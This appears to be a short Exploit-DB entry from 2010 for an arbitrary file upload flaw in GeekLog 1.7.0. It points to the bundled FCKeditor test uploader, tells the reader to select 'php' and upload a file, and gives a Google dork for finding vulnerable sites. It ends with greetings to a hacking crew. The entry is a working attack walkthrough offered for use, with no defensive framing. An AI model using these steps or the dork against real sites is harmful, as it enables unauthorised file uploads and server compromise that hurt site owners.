GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload

EDB-ID:

15277

CVE:





Platform:

PHP

Date:

2010-10-18


###################################################                                               
#        db         88        88    ,ad8888ba,    #
#       d88b        88        88   d8"'    `"8b   # 
#      d8'`8b       88        88  d8'             #
#     d8'  `8b      88aaaaaaaa88  88              #
#    d8YaaaaY8b     88""""""""88  88      88888   #
#   d8""""""""8b    88        88  Y8,        88   #
#  d8'        `8b   88        88   Y8a.    .a88   #
# d8'          `8b  88        88    `"Y88888P"    #
#                                                 #
#                                                 #
###################################################
#
# Exploit Title: Geeklog
# Date: 18-10-2010
# Author: Kubanezi AHG
# Software Link: http://www.geeklog.net/
# Version: 1.7.0
# Tested on: Linux Ubuntu 9.04                       
# dork : inurl:"/geeklog/"    
# Contact: aldo@dibranet.net                       
#                                                    
####################################################

    exploit # geeklog/fckeditor/editor/filemanager/upload/test.html


first go to # http://site.com/Geeklog/


       then # http://site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html
   
     select # "php"


Upload There Hacked.txt  And Copy Output Link 

#######################################################
            Exploit By Kubanezi
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Greetz : AHG-Crew , Mistreriozi , Boom ,Twilight , AutoruN , DoctorSQl 
          , Drake , Dj-Dukli , EragoN , Khaled , MossaD , BH-TREX